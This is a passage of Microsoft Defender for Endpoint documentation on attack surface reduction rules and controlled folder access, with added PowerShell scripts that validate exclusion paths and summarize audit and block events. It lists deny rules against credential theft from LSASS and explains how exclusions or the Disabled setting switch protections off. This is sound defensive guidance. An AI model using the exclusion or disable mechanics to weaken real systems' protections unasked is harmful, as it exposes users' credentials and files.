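The constraints listed above are the ones that most often turn a deployed exclusion into a silent no-op. The following PowerShell is an added example, not code from the Microsoft article, that checks candidate exclusion paths against those constraints (no quotes, no wildcard in the drive letter, no per-user environment variables, no stray whitespace) and emits the "|"-joined value used by the AttackSurfaceReductionOnlyExclusions CSP described in the MDM section. The sample paths, the list of variables treated as per-user, and the function names Test-AsrExclusionPath and New-AsrExclusionsOmaUriValue are constructed for this example.

```powershell
# Added example (not from the Microsoft article): validate ASR exclusion paths
# against the documented limits before they are deployed.

# Constructed list of variables that only exist in a user's logon session; under
# NT AUTHORITY\SYSTEM they don't resolve to the path an admin expects.
$UserScopedVars = 'USERPROFILE', 'APPDATA', 'LOCALAPPDATA', 'HOMEPATH', 'HOMEDRIVE', 'USERNAME', 'OneDrive'

function Test-AsrExclusionPath {
    param([Parameter(Mandatory)][string]$Path)
    $problems = @()
    # Group Policy exclusions don't support quotes; the engine handles spaces itself.
    if ($Path -match '["'']') { $problems += 'contains quotes' }
    # Wildcards can't stand in for the drive letter.
    if ($Path -match '^[\*\?]:') { $problems += 'wildcard used as drive letter' }
    # Flag environment variables that are per-user rather than machine-wide.
    foreach ($m in [regex]::Matches($Path, '%([^%]+)%')) {
        $name = $m.Groups[1].Value
        if ($UserScopedVars -contains $name) {
            $problems += "%$($name)% is a per-user variable and won't resolve under SYSTEM"
        }
    }
    # Leading or trailing whitespace changes the path and is easy to miss in a CSV.
    if ($Path -ne $Path.Trim()) { $problems += 'leading or trailing whitespace' }
    [pscustomobject]@{
        Path     = $Path
        Valid    = ($problems.Count -eq 0)
        Problems = ($problems -join '; ')
    }
}

function New-AsrExclusionsOmaUriValue {
    param([Parameter(Mandatory)][string[]]$Paths)
    $checked = $Paths | ForEach-Object { Test-AsrExclusionPath -Path $_ }
    $bad = @($checked | Where-Object { -not $_.Valid })
    if ($bad.Count -gt 0) {
        $bad | ForEach-Object { Write-Warning "$($_.Path): $($_.Problems)" }
        throw 'Fix the paths above before deploying the exclusion list.'
    }
    # Same "|"-separated layout as the article's CSP example, no spaces.
    ($checked | ForEach-Object Path) -join '|'
}

# Constructed candidates: two acceptable, two that violate the documented limits.
$candidates = @(
    'C:\Folder\*\*\Test',                       # nested folders via \*\
    '%ProgramFiles%\Contoso\fileversion?.docx', # machine variable plus ? for one random character
    '"C:\Program Files\Contoso\app.exe"',       # quotes: rejected
    '%USERPROFILE%\Tools\tool.exe'              # per-user variable: rejected
)
$candidates | ForEach-Object { Test-AsrExclusionPath -Path $_ } | Format-Table -AutoSize

$value = New-AsrExclusionsOmaUriValue -Paths $candidates[0..1]
Write-Output "AttackSurfaceReductionOnlyExclusions value: $value"
```

The per-user variable list is deliberately a deny-list rather than a lookup against the machine environment, because variables such as ProgramFiles are supplied by the system at process start and are not stored in the machine-scope environment key.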

How do I know what I need to exclude?

Different attack surface reduction rules have different protection flows. Always think
about what the attack surface reduction rule you're configuring protects against, and
how the actual execution flow pans out.

Example: Block credential stealing from the Windows local security authority
subsystem

Reading directly from the Local Security Authority Subsystem (LSASS) process
can be a security risk, since it might expose corporate credentials.

This rule prevents untrusted processes from having direct access to LSASS memory.
Whenever a process tries to use the OpenProcess() function to access LSASS with an
access right of PROCESS_VM_READ, the rule specifically blocks that access right.
In this example, if you really had to create an exception for the process whose
access right was blocked, adding the filename along with its full path as an exclusion
would exclude it from being blocked and allow it to access LSASS process memory. The
value of 0 means that attack surface reduction rules ignore this file/process and don't
block or audit it.

How do I configure per-rule exclusions?

For information about configuring per-rule exclusions, see Test attack surface reduction
rules.

What are the rules Microsoft recommends enabling?

We recommend enabling every possible rule. However, there are some cases where you
shouldn't enable a rule. For example, we don't recommend enabling the Block process
creations originating from PSExec and WMI commands rule, if you're using Microsoft
Endpoint Configuration Manager (or, System Center Configuration Manager - SCCM) to
manage your endpoints.

We highly recommend that you read the rule-specific information and warnings, which
are available in our public documentation and span multiple pillars of protection,
like Office, Credentials, Scripts, E-Mail, etc. All attack surface reduction rules,
except for Block persistence through WMI event subscription, are supported on
Windows 1709 and later:
Block abuse of exploited vulnerable signed drivers
Block executable content from email client and webmail
Block all Office applications from creating child processes
Block Office applications from creating executable content
Block Office applications from injecting code into other processes
Block JavaScript or VBScript from launching downloaded executable content
Block execution of potentially obfuscated scripts
Block Win32 API calls from Office macro
Use advanced protection against ransomware
Block credential stealing from the Windows local security authority subsystem
(lsass.exe)
Block process creations originating from PSExec and WMI commands
Block untrusted and unsigned processes that run from USB
Block executable files from running unless they meet a prevalence, age, or trusted
list criteria
Block Office communication applications from creating child processes
Block Adobe Reader from creating child processes
Block persistence through WMI event subscription

Is Local security authority subsystem enabled by default?

The default state for the attack surface reduction rule "Block credential stealing from
the Windows local security authority subsystem (lsass.exe)" changes from Not
Configured to Configured and the default mode set to Block. All other attack surface
reduction rules remain in their default state: Not Configured. Additional filtering logic
has already been incorporated in the rule to reduce end user notifications. Customers
can configure the rule to Audit, Warn or Disabled modes, which overrides the default
mode. The functionality of this rule is the same, whether the rule is configured in the
on-by-default mode, or if you enable Block mode manually.

What are some good recommendations for getting started with attack surface reduction?

Test how attack surface reduction rules impact your organization before enabling them
by running attack surface reduction rules in audit mode for a brief period of time. While
you're running the rules in audit mode, you can identify any line-of-business
applications that might get blocked erroneously, and exclude them from attack surface
reduction.

Larger organizations should consider rolling out attack surface reduction rules in "rings,"
by auditing and enabling rules in increasingly broader subsets of devices. You can
arrange your organization's devices into rings by using Intune or a Group Policy
management tool.

How long should I test an attack surface reduction rule in audit mode before enabling it?

Keep the rule in audit mode for about 30 days to get a good baseline for how the rule
operates once it goes live throughout your organization. During the audit period, you
can identify any line-of-business applications that might get blocked by the rule, and
configure the rule to exclude them.
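The baseline from the audit period is only useful if it is measured: which rules fired, how often, and for which programs. The following PowerShell is an added example, not code from the Microsoft article, that summarizes the local Microsoft Defender Antivirus operational log for the audit window. It relies on two documented event IDs: 1121 is written when a rule fires in Block mode and 1122 when it fires in Audit mode, and both carry the rule GUID in their message. The message is also assumed to contain a line starting with "Path:" naming the affected file; that layout assumption is best-effort and the summary still works when it does not match. The function name Get-AsrEventSummary and the 30-day window are constructed for this example; run it elevated on each device in the pilot ring.

```powershell
# Added example (not from the Microsoft article): summarize ASR audit and block
# events from the local Defender operational log for the audit period.

# Documented ASR event IDs: 1121 = fired in Block mode, 1122 = fired in Audit mode.
$AsrEventMode = @{ 1121 = 'Block'; 1122 = 'Audit' }

function Get-AsrEventSummary {
    param(
        [int]$Days = 30,
        [string]$ComputerName   # optional: query another device's log
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddDays(-$Days)
    }
    $params = @{ FilterHashtable = $filter; ErrorAction = 'SilentlyContinue' }
    if ($ComputerName) { $params.ComputerName = $ComputerName }
    $events = @(Get-WinEvent @params)
    if ($events.Count -eq 0) { return @() }

    $rows = foreach ($e in $events) {
        # The rule GUID is the stable identifier in the message text, so match it
        # with a regex instead of relying on field positions.
        $guid = [regex]::Match($e.Message, '[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}', 'IgnoreCase').Value
        # Assumption: the message has a "Path: <file>" line; empty if it doesn't.
        $path = [regex]::Match($e.Message, '(?m)^\s*Path:\s*(.+?)\s*$').Groups[1].Value
        [pscustomobject]@{
            RuleId = $guid.ToLowerInvariant()
            Mode   = $AsrEventMode[$e.Id]
            Path   = $path
            Time   = $e.TimeCreated
        }
    }

    # One line per rule/mode/path: the paths with the highest counts are the
    # candidates to investigate before deciding on an exclusion.
    $rows | Group-Object RuleId, Mode, Path | ForEach-Object {
        $times = @($_.Group.Time | Sort-Object)
        [pscustomobject]@{
            RuleId    = $_.Group[0].RuleId
            Mode      = $_.Group[0].Mode
            Path      = $_.Group[0].Path
            Events    = $_.Count
            FirstSeen = $times[0]
            LastSeen  = $times[-1]
        }
    } | Sort-Object Events -Descending
}

Get-AsrEventSummary -Days 30 | Format-Table -AutoSize
```

A high count for a single path does not by itself justify an exclusion; as the earlier FAQ entry on exclusions says, think about what the rule protects against and whether that program genuinely needs the behavior the rule is flagging.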

I'm making the switch from a third-party security solution to Defender for
Endpoint. Is there an "easy" way to export rules from another security
solution to attack surface reduction?

In most cases, it's easier and better to start with the baseline recommendations
suggested by Defender for Endpoint than to attempt to import rules from another
security solution. Then, use tools such as audit mode, monitoring, and analytics to
configure your new solution to suit your unique needs.

The default configuration for most attack surface reduction rules, combined with
Defender for Endpoint's real-time protection, protects against a large number of
exploits and vulnerabilities.

From within Defender for Endpoint, you can update your defenses with custom
indicators, to allow and block certain software behaviors. Attack surface reduction also
allows for some customization of rules, in the form of file and folder exclusions. As a
general rule, it's best to audit a rule for a period of time, and configure exclusions for
any line-of-business applications that might get blocked.

Does attack surface reduction support file or folder exclusions that include
system variables and wildcards in the path?

Yes. For more information on excluding files or folders from attack surface reduction
rules, see Excluding files and folders from attack surface reduction rules, and for more
information on using system variables and wildcards in excluded file paths, see Configure
and validate exclusions based on file extension and folder location.

Do attack surface reduction rules cover all applications by default?

It depends on the rule. Most attack surface reduction rules cover the behavior of
Microsoft Office products and services, such as Word, Excel, PowerPoint, and OneNote,
or Outlook. Certain attack surface reduction rules, such as Block execution of potentially
obfuscated scripts, are more general in scope.

Does attack surface reduction support third-party security solutions?

Attack surface reduction uses Microsoft Defender Antivirus to block applications. It is not
possible to configure attack surface reduction to use another security solution for
blocking at this time.

I have an E5 license and enabled some attack surface reduction rules in
conjunction with Defender for Endpoint. Is it possible for an attack surface
reduction event to not show up at all in Defender for Endpoint's event timeline?

Whenever a notification is triggered locally by an attack surface reduction rule, a report
on the event is also sent to the Defender for Endpoint portal. If you're having trouble
finding the event, you can filter the events timeline using the search box. You can also
view attack surface reduction events by visiting Go to attack surface management, from
the Configuration management icon in the Defender for Cloud taskbar. The attack
surface management page includes a tab for report detections, which includes a full list
of attack surface reduction rule events reported to Defender for Endpoint.

I applied a rule using GPO. Now when I try to check the indexing options for
the rule in Microsoft Outlook, I get a message stating, 'Access denied'.

Try opening the indexing options directly from Windows 10 or Windows 11.

1. Select the Search icon on the Windows taskbar.

2. Enter Indexing options into the search box.

Are the criteria used by the rule, "Block executable files from running unless
they meet a prevalence, age, or trusted list criterion," configurable by an admin?

No. The criteria used by this rule are maintained by Microsoft cloud protection, to keep
the trusted list constantly up to date with data gathered from around the world. Local
admins don't have write access to alter this data. If you're looking to configure this rule
to tailor it for your enterprise, you can add certain applications to the exclusions list to
prevent the rule from being triggered.

I enabled the attack surface reduction rule, 'Block executable files from
running unless they meet a prevalence, age, or trusted list criterion'. After some
time, I updated a piece of software, and the rule is now blocking it, even though
it didn't before. Did something go wrong?

This rule relies upon each application having a known reputation, as measured by
prevalence, age, or inclusion on a list of trusted apps. The rule's decision to block or
allow an application is ultimately determined by Microsoft cloud protection's
assessment of these criteria.

Usually, cloud protection can determine that a new version of an application is similar
enough to previous versions that it doesn't need to be reassessed at length. However, it
might take some time for the app to build reputation after switching versions,
particularly after a major update. In the meantime, you can add the application to the
exclusions list, to prevent this rule from blocking important applications. If you're
frequently updating and working with new versions of applications, you may opt instead
to run this rule in audit mode.

I recently enabled the attack surface reduction rule, 'Block credential stealing
from the Windows local security authority subsystem (lsass.exe)', and I'm
getting a large number of notifications. What is going on?

A notification generated by this rule doesn't necessarily indicate malicious activity;
however, this rule is still useful for blocking malicious activity, since malware often
targets lsass.exe to gain illicit access to accounts. The lsass.exe process stores user
credentials in memory after a user has logged in. Windows uses these credentials to
validate users and apply local security policies.
Because many legitimate processes throughout a typical day are calling on lsass.exe for
credentials, this rule can be especially noisy. If a known legitimate application causes this
rule to generate an excessive number of notifications, you can add it to the exclusion
list. Most other attack surface reduction rules generate a relatively smaller number of
notifications, in comparison to this one, since calling on lsass.exe is typical of many
applications' normal functioning.

Is it a good idea to enable the rule, 'Block credential stealing from the
Windows local security authority subsystem (lsass.exe)', alongside LSA protection?

Enabling this rule doesn't provide additional protection if you have LSA protection
enabled as well. Both the rule and LSA protection work in much the same way, so having
both running at the same time would be redundant. However, sometimes you may not
be able to enable LSA protection. In those cases, you can enable this rule to provide
equivalent protection against malware that targets lsass.exe.

See also
Attack surface reduction overview
Evaluate attack surface reduction rules
Attack surface reduction rules deployment Step 3: Implement attack surface
reduction rules
Enable attack surface reduction rules
Compatibility of Microsoft Defender Antivirus with other antivirus/antimalware



Protect important folders with controlled folder access
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Applies to

Windows

Want to experience Defender for Endpoint? Sign up for a free trial.

What is controlled folder access?

Controlled folder access helps protect your valuable data from malicious apps and
threats, such as ransomware. Controlled folder access protects your data by checking
apps against a list of known, trusted apps. Supported on Windows Server 2012 R2,
Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows 10, and
Windows 11 clients, controlled folder access can be turned on using the Windows
Security App, Microsoft Endpoint Configuration Manager, or Intune (for managed
devices).

Note

Scripting engines are not trusted and you cannot allow them access to controlled
protected folders. For example, PowerShell is not trusted by controlled folder
access, even if you allow with certificate and file indicators.

Controlled folder access works best with Microsoft Defender for Endpoint, which gives
you detailed reporting into controlled folder access events and blocks as part of the
usual alert investigation scenarios.

Tip

Controlled folder access blocks don't generate alerts in the Alerts queue. However,
you can view information about controlled folder access blocks in the device
timeline view, while using advanced hunting, or with custom detection rules.

How does controlled folder access work?

Controlled folder access works by only allowing trusted apps to access protected
folders. Protected folders are specified when controlled folder access is configured.
Typically, commonly used folders, such as those used for documents, pictures,
downloads, and so on, are included in the list of controlled folders.

Controlled folder access works with a list of trusted apps. Apps that are included in the
list of trusted software work as expected. Apps that are not included in the list are
prevented from making any changes to files inside protected folders.

Apps are added to the list based upon their prevalence and reputation. Apps that are
highly prevalent throughout your organization and that have never displayed any
behavior deemed malicious are considered trustworthy. Those apps are added to the list
automatically.

Apps can also be added manually to the trusted list by using Configuration Manager or
Intune. Additional actions can be performed from the Microsoft Defender portal.

Why controlled folder access is important


Controlled folder access is especially useful in helping to protect your documents and
information from ransomware. In a ransomware attack, your files can get encrypted
and held hostage. With controlled folder access in place, a notification appears on the
computer where an app attempted to make changes to a file in a protected folder. You
can customize the notification with your company details and contact information. You
can also run the feature in audit mode, or limit it to disk-sector protection only, to
control what it monitors and what it enforces.

The protected folders include common system folders (including boot sectors), and you
can add more folders. You can also allow apps to give them access to the protected
folders.

You can use audit mode to evaluate how controlled folder access would impact your
organization if it were enabled.

Controlled folder access is supported on the following versions of Windows:

Windows 10, version 1709 and later
Windows 11
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019
Windows Server 2022

Windows system folders are protected by default

Windows system folders are protected by default, along with several other folders. The
protected folders include common system folders (including boot sectors), and you can
add more folders. You can also allow apps to give them access to the protected folders.
The Windows system folders that are protected by default are:

c:\Users\<username>\Documents
c:\Users\Public\Documents
c:\Users\<username>\Pictures
c:\Users\Public\Pictures
c:\Users\<username>\Videos
c:\Users\Public\Videos
c:\Users\<username>\Music
c:\Users\Public\Music
c:\Users\<username>\Favorites

Default folders appear in the user's profile, under This PC.


Note

You can configure additional folders as protected, but you cannot remove the
Windows system folders that are protected by default.

Requirements for controlled folder access

Controlled folder access requires enabling Microsoft Defender Antivirus real-time
protection.

Review controlled folder access events in the Microsoft Defender portal

Defender for Endpoint provides detailed reporting into events and blocks as part of its
alert investigation scenarios in the Microsoft Defender portal; see Microsoft Defender
for Endpoint in Microsoft Defender XDR.

You can query Microsoft Defender for Endpoint data by using Advanced hunting. If
you're using audit mode, you can use advanced hunting to see how controlled folder
access settings would affect your environment if they were enabled.

Example query (Kusto Query Language, run from the advanced hunting page; the
project line keeps only the columns you need to identify the blocked process and the
file it tried to modify):

Kusto

DeviceEvents
| where ActionType in ('ControlledFolderAccessViolationAudited', 'ControlledFolderAccessViolationBlocked')
| project Timestamp, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessFolderPath

Review controlled folder access events in Windows Event Viewer

You can review the Windows event log to see events that are created when controlled
folder access blocks (or audits) an app:

1. Download the Evaluation Package and extract the file cfa-events.xml to an easily
accessible location on the device.
2. Type Event viewer in the Start menu to open the Windows Event Viewer.
3. On the left panel, under Actions, select Import custom view....
4. Navigate to where you extracted cfa-events.xml and select it. Alternatively, copy
the XML directly.
5. Select OK.

The following table shows events related to controlled folder access:

Event ID | Description
5007 | Settings were changed
1124 | Audited controlled folder access event (audit mode: the change was allowed and logged)
1123 | Blocked controlled folder access event (the change was blocked)

View or change the list of protected folders


You can use the Windows Security app to view the list of folders that are protected by
controlled folder access.

1. On your Windows 10 or Windows 11 device, open the Windows Security app.


2. Select Virus & threat protection.
3. Under Ransomware protection, select Manage ransomware protection.
4. If controlled folder access is turned off, you'll need to turn it on. Select protected
folders.
5. Do one of the following steps:

To add a folder, select + Add a protected folder.


To remove a folder, select it, and then select Remove.

Note

Windows system folders are protected by default, and you cannot remove them
from the list. Subfolders are also included in protection when you add a new folder
to the list.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Evaluate controlled folder access
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Controlled folder access is a feature that helps protect your documents and files from
modification by suspicious or malicious apps. Controlled folder access is supported on
Windows Server 2019, Windows Server 2022, Windows 10, and Windows 11 clients, and
on Windows Server 2012 R2 and Windows Server 2016 with the modern unified solution.

It's especially useful in helping protect against ransomware that attempts to encrypt
your files and hold them hostage.

This article helps you evaluate controlled folder access. It explains how to enable audit
mode so you can test the feature directly in your organization.

Use audit mode to measure impact


Enable the controlled folder access in audit mode to see a record of what could occur if
it were enabled. Test how the feature works in your organization to ensure it doesn't
affect your line-of-business apps. You can also get an idea of how many suspicious
attempts to modify files generally occur over a certain period of time.

To enable audit mode, use the following PowerShell cmdlet:

PowerShell

Set-MpPreference -EnableControlledFolderAccess AuditMode

Tip

If you want to fully audit how controlled folder access will work in your
organization, deploy this setting to the devices in your network(s) with a
management tool: Group Policy, Intune, mobile device management (MDM), or
Microsoft Configuration Manager can all configure and deploy the setting, as
described in the main controlled folder access topic.

Review controlled folder access events in Windows Event Viewer

The following controlled folder access events appear in Windows Event Viewer under
Applications and Services Logs > Microsoft > Windows > Windows Defender > Operational.

Event ID | Description
5007 | Settings were changed
1124 | Audited controlled folder access event
1123 | Blocked controlled folder access event

Tip

You can configure a Windows Event Forwarding subscription to collect the logs
centrally.
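Reading those events with PowerShell, as an added example that is not part of the original article: the script below puts controlled folder access in audit mode, pulls event IDs 1123 and 1124 from the Microsoft-Windows-Windows Defender/Operational log, and groups them by the process that touched a protected folder. That grouped list is what you later review when deciding which apps, if any, to add to the allowed-applications list. It assumes an elevated PowerShell session and that the event message carries the standard "Path:" (file touched) and "Process Name:" (process that touched it) fields; the seven-day window and the CSV path are arbitrary choices.

```powershell
# Added example (not Microsoft's code): summarize controlled folder access
# audit/block events from the local Defender Antivirus operational log.
# Assumes the event message contains "Path:" and "Process Name:" fields.

# Put the feature in audit mode for the evaluation window: nothing is
# enforced, but every would-be block is logged as event 1124.
Set-MpPreference -EnableControlledFolderAccess AuditMode

# Collect 1123 (blocked) and 1124 (audited) events from the last 7 days.
$filter = @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1123, 1124
    StartTime = (Get-Date).AddDays(-7)
}
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

if (-not $events) {
    Write-Host 'No controlled folder access events found in the last 7 days.'
    return
}

# Pull the process and target file out of each event's message text.
$parsed = foreach ($e in $events) {
    $proc = if ($e.Message -match '(?m)^\s*Process Name:\s*(.+?)\s*$') { $Matches[1] } else { '<unknown>' }
    $path = if ($e.Message -match '(?m)^\s*Path:\s*(.+?)\s*$')         { $Matches[1] } else { '<unknown>' }
    [pscustomobject]@{
        Time    = $e.TimeCreated
        Mode    = if ($e.Id -eq 1123) { 'Blocked' } else { 'Audited' }
        Process = $proc
        Target  = $path
    }
}

# Which processes would be blocked, and how often? These are the candidates
# for the allowed-applications list, once you have verified they are trusted.
$parsed |
    Group-Object Process |
    Sort-Object Count -Descending |
    Select-Object Count, Name,
        @{ n = 'SampleTargets'; e = { ($_.Group.Target | Sort-Object -Unique | Select-Object -First 3) -join '; ' } } |
    Format-Table -AutoSize

# Keep the full detail for review alongside advanced hunting results.
$parsed | Export-Csv -Path "$env:TEMP\cfa-audit-summary.csv" -NoTypeInformation
```

Run it on a handful of representative devices before deploying audit mode broadly; a process that shows up on every device with the same target folders is usually a line-of-business app that needs an allow entry, while a process that appears once, from a user-writable path, is the case the feature exists to catch.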

Customize protected folders and apps


During your evaluation, you might want to add to the list of protected folders, or allow
certain apps to modify files.

See Protect important folders with controlled folder access for configuring the feature
with management tools, including Group Policy, PowerShell, and MDM configuration
service providers (CSPs).

See also
Protect important folders with controlled folder access
Evaluate Microsoft Defender for Endpoint
Use audit mode



Enable controlled folder access
Article • 08/16/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows

Want to experience Defender for Endpoint? Sign up for a free trial.

Controlled folder access helps you protect valuable data from malicious apps and
threats, such as ransomware. Controlled folder access is included with Windows 10,
Windows 11, and Windows Server 2019. Controlled folder access is also included as part
of the modern, unified solution for Windows Server 2012 R2 and Windows Server 2016.

You can enable controlled folder access by using any of these methods:

Windows Security app *


Microsoft Intune
Mobile Device Management (MDM)
Microsoft Configuration Manager
Group Policy
PowerShell

Tip

Try using audit mode at first so you can see how the feature works and review
events without impacting normal device usage in your organization.

Group Policy settings that disable local administrator list merging will override
controlled folder access settings. They also override protected folders and allowed apps
set by the local administrator through controlled folder access. These policies include:

Microsoft Defender Antivirus: Configure local administrator merge behavior for lists
System Center Endpoint Protection: Allow users to add exclusions and overrides

For more information about disabling local list merging, see Prevent or allow users to
locally modify Microsoft Defender Antivirus policy settings.

Windows Security app


1. Open the Windows Security app by selecting the shield icon in the task bar. You
can also search the start menu for Windows Security.

2. Select the Virus & threat protection tile (or the shield icon on the left menu bar)
and then select Ransomware protection.

3. Set the switch for Controlled folder access to On.

Note

*This method is not available on Windows Server 2012 R2 or 2016.

If controlled folder access is configured with Group Policy, PowerShell, or MDM
CSPs, the state will change in the Windows Security app after a restart of the
device. If the feature is set to Audit mode with any of those tools, the Windows
Security app will show the state as Off. If you are protecting user profile data, we
recommend that the user profile should be on the default Windows installation
drive.

Microsoft Intune
1. Sign in to the Microsoft Intune admin center and open Endpoint Security.

2. Go to Attack Surface Reduction > Policy.

3. Select Platform, choose Windows 10, Windows 11, and Windows Server, and
select the profile Attack Surface Reduction rules > Create.

4. Name the policy and add a description. Select Next.

5. Scroll down, and in the Enable Controlled Folder Access drop-down, select an
option, such as Audit Mode.

We recommend enabling controlled folder access in audit mode first to see how
it'll work in your organization. You can set it to another mode, such as Enabled,
later.
6. To optionally add folders that should be protected, select Controlled Folder
Access Protected Folders and then add folders. Files in these folders can't be
modified or deleted by untrusted applications. Keep in mind that your default
system folders are automatically protected. You can view the list of default system
folders in the Windows Security app on a Windows device. To learn more about
this setting, see Policy CSP - Defender: ControlledFolderAccessProtectedFolders.

7. To optionally add applications that should be trusted, select Controlled Folder


Access Allowed Applications and then add the apps can access protected folders.
Microsoft Defender Antivirus automatically determines which applications should
be trusted. Only use this setting to specify additional applications. To learn more
about this setting, see Policy CSP - Defender:
ControlledFolderAccessAllowedApplications.

8. Select the profile Assignments, assign to All Users & All Devices, and select Save.

9. Select Next to save each open blade and then Create.

Note

Wildcards are supported for applications, but not for folders. Subfolders are not
protected. Allowed apps will continue to trigger events until they are restarted.

Mobile Device Management (MDM)


Use the ./Vendor/MSFT/Policy/Config/Defender/EnableControlledFolderAccess
configuration service provider (CSP) to turn the feature on or put it in audit mode.
Use ./Vendor/MSFT/Policy/Config/Defender/ControlledFolderAccessProtectedFolders to
add protected folders, and
./Vendor/MSFT/Policy/Config/Defender/ControlledFolderAccessAllowedApplications to
allow apps to make changes to protected folders.

Microsoft Configuration Manager


1. In Microsoft Configuration Manager, go to Assets and Compliance > Endpoint
Protection > Windows Defender Exploit Guard.

2. Select Home > Create Exploit Guard Policy.

3. Enter a name and a description, select Controlled folder access, and select Next.

4. Choose whether block or audit changes, allow other apps, or add other folders,
and select Next.

Note
Wildcard is supported for applications, but not for folders. Subfolders are not
protected. Allowed apps will continue to trigger events until they are
restarted.

5. Review the settings and select Next to create the policy.

6. After the policy is created, Close.

Group Policy
1. On your Group Policy management device, open the Group Policy Management
Console , right-click the Group Policy Object you want to configure and select
Edit.

2. In the Group Policy Management Editor, go to Computer configuration and


select Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Microsoft Defender Exploit Guard > Controlled folder access.

4. Double-click the Configure Controlled folder access setting and set the option to
Enabled. In the options section you must specify one of the following options:

Enable: Malicious and suspicious apps won't be allowed to make changes to files in
protected folders. A notification will be provided in the Windows event log.

Disable (Default): The Controlled folder access feature won't work. All apps can make
changes to files in protected folders.

Audit Mode: Changes will be allowed if a malicious or suspicious app attempts to make
a change to a file in a protected folder. However, the attempt will be recorded in the
Windows event log, where you can assess the impact on your organization.

Block disk modification only: Attempts by untrusted apps to write to disk sectors will
be blocked and logged in the Windows event log. These logs can be found in
Applications and Services Logs > Microsoft > Windows > Windows Defender >
Operational > ID 1123.

Audit disk modification only: Only attempts to write to protected disk sectors will be
recorded in the Windows event log (under Applications and Services Logs > Microsoft >
Windows > Windows Defender > Operational > ID 1124). Attempts to modify or delete
files in protected folders won't be recorded.

Important

To fully enable controlled folder access, you must set the Group Policy option to
Enabled and select Block in the options drop-down menu.

PowerShell
1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator.

2. Enter the following cmdlet:

PowerShell

Set-MpPreference -EnableControlledFolderAccess Enabled

You can enable the feature in audit mode by specifying AuditMode instead of Enabled .

Use Disabled to turn off the feature.

See also
Protect important folders with controlled folder access
Customize controlled folder access
Evaluate Microsoft Defender for Endpoint



Customize controlled folder access
Article • 10/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows

Tip

Want to experience Defender for Endpoint? Sign up for a free trial.

Controlled folder access helps you protect valuable data from malicious apps and
threats, such as ransomware. Controlled folder access is supported on Windows Server
2019, Windows Server 2022, Windows 10, and Windows 11 clients. This article describes
how to customize controlled folder access capabilities, and includes the following
sections:

Protect additional folders


Add apps that should be allowed to access protected folders
Allow signed executable files to access protected folders
Customize the notification

Important

Controlled folder access monitors apps for activities that are detected as malicious.
Sometimes, legitimate apps are blocked from making changes to your files. If
controlled folder access impacts your organization's productivity, you might
consider running this feature in audit mode to fully assess the impact.

Protect additional folders


Controlled folder access applies to many system folders and default locations, including
folders such as Documents, Pictures, and Movies. You can add other folders to be
protected, but you cannot remove the default folders in the default list.

Adding other folders to controlled folder access can be helpful for cases when you don't
store files in the default Windows libraries, or you've changed the default location of
your libraries.

You can also specify network shares and mapped drives. Environment variables are
supported; however, wildcards are not.

You can use the Windows Security app, Group Policy, PowerShell cmdlets, or mobile
device management configuration service providers to add and remove protected
folders.

Use the Windows Security app to protect additional folders

1. Open the Windows Security app by selecting the shield icon in the task bar, or by
searching for security in the Start menu.

2. Select Virus & threat protection, and then scroll down to the Ransomware
protection section.

3. Select Manage ransomware protection to open the Ransomware protection pane.

4. Under the Controlled folder access section, select Protected folders.

5. Choose Yes on the User Access Control prompt. The Protected folders pane
displays.

6. Select Add a protected folder and follow the prompts to add folders.

Use Group Policy to protect additional folders


1. On your Group Policy management computer, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure, and then select Edit.

3. In your Group Policy Management Editor, go to Computer configuration >


Policies > Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Windows Defender Exploit Guard > Controlled folder access.
NOTE: On older versions of Windows, you might see Windows Defender Antivirus
instead of Microsoft Defender Antivirus.

5. Double-click Configured protected folders, and then set the option to Enabled.
Select Show, and specify each folder that you want to protect.

6. Deploy your Group Policy Object as you usually do.

Use PowerShell to protect additional folders

1. Type PowerShell in the Start menu, right-click Windows PowerShell and select Run
as administrator.

2. Type the following PowerShell cmdlet, replacing <the folder to be protected>
with the folder's path (such as "c:\apps\"):

PowerShell

Add-MpPreference -ControlledFolderAccessProtectedFolders "<the folder to be protected>"

3. Repeat step 2 for each folder that you want to protect. Folders that are protected
are visible in the Windows Security app.

Important

Use Add-MpPreference to append folders to the list, not Set-MpPreference. Running
Set-MpPreference -ControlledFolderAccessProtectedFolders replaces the existing list
with whatever value you supply.

Use MDM CSPs to protect additional folders

Use the ./Vendor/MSFT/Policy/Config/Defender/ControlledFolderAccessProtectedFolders
configuration service provider (CSP) to add folders to the protected list.

Allow specific apps to make changes to controlled folders

You can specify if certain apps are always considered safe and give write access to files
in protected folders. Allowing apps can be useful if a particular app you know and trust
is being blocked by the controlled folder access feature.

Important

By default, Windows adds apps that are considered friendly to the allowed list. Such
apps that are added automatically are not recorded in the list shown in the
Windows Security app or by using the associated PowerShell cmdlets. You shouldn't
need to add most apps. Only add apps if they are being blocked and you can verify
their trustworthiness.

When you add an app, you have to specify the app's location. Only the app in that
location will be permitted access to the protected folders. If the app (with the same
name) is in a different location, it will not be added to the allowlist and may be blocked
by controlled folder access.

An allowed application or service only has write access to a controlled folder after it
